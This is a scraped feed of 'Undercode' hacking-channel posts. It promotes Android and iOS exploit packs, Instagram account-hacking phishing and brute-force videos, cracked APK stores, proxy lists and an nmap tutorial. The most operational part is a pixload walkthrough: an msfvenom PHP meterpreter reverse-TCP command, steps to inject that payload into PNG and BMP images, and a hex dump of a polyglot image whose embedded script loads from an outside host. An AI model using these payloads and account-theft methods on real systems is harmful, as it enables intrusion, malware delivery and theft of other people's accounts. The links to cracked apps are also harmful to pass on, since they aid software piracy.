▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK ANDROID:
free real Android-Exploits:
A collection of android Exploits and guide on android exploitation

root@n3x7:~$ ls -l
drwxr-xr-x dos - Denial Of Service exploits
drwxr-xr-x local - Local Exploits
drwxr-xr-x remote - remote exploits
drwxr-xr-x webapps - webapp exploits

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1)git clone https://github.com/sundaysec/Android-Exploits.git

Recommend you grab exploitpack latest version

2) wget https://github.com/juansacco/exploitpack/archive/master.zip

3) Extract then Navigate into the folder and type:

4) java -jar ExploitPack.jar

5) Load the exploits


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

ios 10 -11 exploits & crash :

https://github.com/649/Crash-iOS-Exploit

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑VERIFIED INSTAGRAM HACK/PENTESTING VIDEOS :

Phishing termux:
https://www.youtube.com/watch?v=S6uoa7BDICc

https://securityequifax2017.com/how-to-hack-instagram-password-tutorial/ (8 meth)

https://youtu.be/Y0TdkocnrlY (bruteforce)

https://www.youtube.com/watch?v=zFo8okxBKDc&list=PLPEAmW0c6WNATuUIw0T8iG5J-0-30F61o&index=55

https://www.youtube.com/watch?v=KZEcFn3Z5L0


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 BUG HUNTING :


Basics
Setup
Tools
Labs & Testing Environments
Vulnerability Types
Mobile Hacking
Smart Contracts
Coding & Scripting
Hardware & IoT
Blog posts & Talks
Media Resources
Certifications
Mindset & Mental Health

FREE NOW : https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE LEAKS & VULN SEARCH ENGINES:

https://leakix.net/

http://punkspider.org/

https://code.google.com/p/skipfish/

http://www.arachni-scanner.com/

http://wapiti.sourceforge.net/

https://www.rapid7.com/products/nexpose/

https://subgraph.com/vega/index.en.html

https://ivre.rocks/

shodan.io

enjoy
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

practical

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NMAP COMMANDS LEARN :


1) Basic Nmap Scan against IP or host
nmap 1.1.1.1

Now, if you want to scan a hostname, simply replace the IP for the host, as you see below:

nmap cloudflare.com

These kinds of basic scans are perfect for your first steps when starting with Nmap.

2. Scan specific ports or scan entire port ranges on a local or remote server
nmap -p 1-65535 localhost

In this example, we scanned all 65535 ports for our localhost computer.

Nmap is able to scan all possible ports, but you can also scan specific ports, which will report faster results. See below:

nmap -p 80,443 8.8.8.8

3. Scan multiple IP addresses
Let’s try to scan multiple IP addresses. For this you need to use this syntax:

nmap 1.1.1.1 8.8.8.8

You can also scan consecutive IP addresses:

nmap -p 1.1.1.1,2,3,4

This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4.

4. Scan IP ranges
You can also use Nmap to scan entire CIDR IP ranges, for example:

nmap -p 8.8.8.0/28

This will scan 14 consecutive IP ranges, from 8.8.8.1 to 8.8.8.14.

An alternative is to simply use this kind of range:

nmap 8.8.8.1-14

You can even use wildcards to scan the entire C class IP range, for example:

nmap 8.8.8.*

This will scan 256 IP addresses from 8.8.8.1 to 8.8.8.256.

If you ever need to exclude certain IPs from the IP range scan, you can use the “–exclude” option, as you see below:

nmap -p 8.8.8.* --exclude 8.8.8.1

5. Scan the most popular ports
Using “–top-ports” parameter along with a specific number lets you scan the top X most common ports for that host, as we can see:

nmap --top-ports 20 192.168.1.106

Replace “20” with the desired number. Output example:

[root@securitytrails:~]nmap --top-ports 20 localhost
Starting Nmap 6.40 ( http://nmap.org ) at 2018-10-01 10:02 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000016s latency).
Other addresses for localhost (not scanned): 127.0.0.1
PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp filtered http
110/tcp closed pop3
111/tcp closed rpcbind
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
443/tcp filtered https
445/tcp closed microsoft-ds
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
6. Scan hosts and IP addresses reading from a text file
In this case, Nmap is also useful to read files that contain hosts and IPs inside.

Let’s suppose you create a list.txt file that contains these lines inside:

192.168.1.106
cloudflare.com
microsoft.com
securitytrails.com
The “-iL” parameter lets you read from that file, and scan all those hosts for you:

nmap -iL list.txt

7. Save your Nmap scan results to a file
On the other hand, in the following example we will not be reading from a file, but exporting/saving our results into a text file:

nmap -oN output.txt securitytrails.com

Nmap has the ability to export files into XML format as well, see the next example:

nmap -oX output.xml securitytrails.com

8. Disabling DNS name resolution
If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the “-n” parameter

source wiki
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CVE detection using Nmap :

1) One of Nmap’s greatest features that not all the network and systems administrators know about is something called “Nmap Scripting Engine” (known as NSE). This scripting engine allows users to use a pre-defined set of scripts, or write their own using Lua programming language.

2) Using NSE is crucial in order to automate system and vulnerability scans. For example, if you want to run a full vulnerability test against your target, you can use these parameters:

nmap -Pn --script vuln 192.168.1.105

🦑Output example:

[root@securitytrails:~]nmap -Pn --script vuln 192.168.1.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
1900/tcp open upnp
20005/tcp open btx
49152/tcp open unknown
49153/tcp open unknown
As you can see, in this vulnerability test we were able to detect one CVE (Slowloris DOS attack).


don't copy our tutorials
unix forum
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Support & Share us ❤️👍🏻

T.me/UndercodeTesting

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME GOOD EXPLOITS TOOLS UPLOADED TO GITHUB AFTER LEAK SOURCE CODE :

LinEnum | Scripted Local Linux Enumeration & Privilege Escalation Checks

CVE-2017-5123 | Linux Kernel 4.14.0-rc4+ - 'waitid()'
Local Privilege Escalation

Oracle Privilege Escalation via Deserialization

| CVE-2018-3004 Oracle Privilege Escalation via Deserialization

linux-exploit-suggester | The tool is meant to assist the security analyst in his testing for privilege escalation opportunities on Linux machine

BeRoot Project | BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Best cracked stores for mod apk list 5 :

https://blackmart.xyz/apk/

https://www.revdl.com/category/apps/

https://rexdl.com/

https://apkpure.com/

https://apk4free.net/

https://ihackedit.com/

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Warning! New unpatched Bug in monero wallets.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Bug Bounty videos courses :

1 h
https://jerrybanfield.com/the-best-resources-to-learn-bug-bounty/

14 min https://www.bugcrowd.com/resources/webinars/introduction-to-bugcrowd-university/

7 H https://hackwarenews.com/how-to-get-started-as-a-bug-bounty-hunter/

18 min https://medium.com/inbughunters/getting-started-in-bug-bounty-7052da28445a

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Detailed fresh Proxies List

https://pastebin.com/ePTVVTra

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IMAGE PAYLOAD- HACK WINDOWS-ANDROID :

F E A T U R E S ::

Bypassing CSP using polyglot JPEGs

Hacking group using Polyglot images to hide malvertising attacks

Encoding Web Shells in PNG IDAT chunks

An XSS on Facebook via PNGs & Wonky Content Types

Revisiting XSS payloads in PNG IDAT chunks

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/chinarulezzz/pixload.git

2) cd pixload

3) If you want to inject a metasploit payload, try something like this:

msfvenom -p php/meterpreter_reverse_tcp \
LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php

4) # Edit payload.php if need.

5) ./pixload/png.pl -payload "$(cat payload.php)" -output payload.png

6) ./bmp.pl [-payload 'STRING'] -output payload.bmp

If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
Example

7) ./bmp.pl -output payload.bmp

[>| BMP Payload Creator/Injector |<]

https://github.com/chinarulezzz/pixload


[>] Generating output file
[✔️] File saved to: payload.bmp

[>] Injecting payload into payload.bmp
[✔️] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1

00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/*............|
00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |..............*/|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;<script src=/|
00000030 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 72 69 70 |/nji.xyz></scrip|
00000040 74 3e 3b |t>;|
00000043

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BYPASS MICROSOFT.COM RESTRICTION DOWNLOAD:

Windows 7 official
https://download.microsoft.com/download/5/1/9/5195A765-3A41-4A72-87D8-200D897CBE21/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_ULTIMATE_x64FRE_en-us.iso

windows 10 official
X 64 https://software-download.microsoft.com/pr/Win10_2004_English_x64.iso?t=b9c74c93-47e9-43b4-b84c-2960a16795b3&e=1602592122&h=9ee311b03b4b846bd513140d2ac7961e

X32 https://software-download.microsoft.com/pr/Win10_2004_English_x32.iso?t=b9c74c93-47e9-43b4-b84c-2960a16795b3&e=1602592122&h=328d4291008d28513bb3944e5a18af54

OFFICE 2019 PRO PLUS OFFICIAL:

https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-US/ProPlus2019Retail.img

If you need more dm any admin from @Undercode_Testing

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁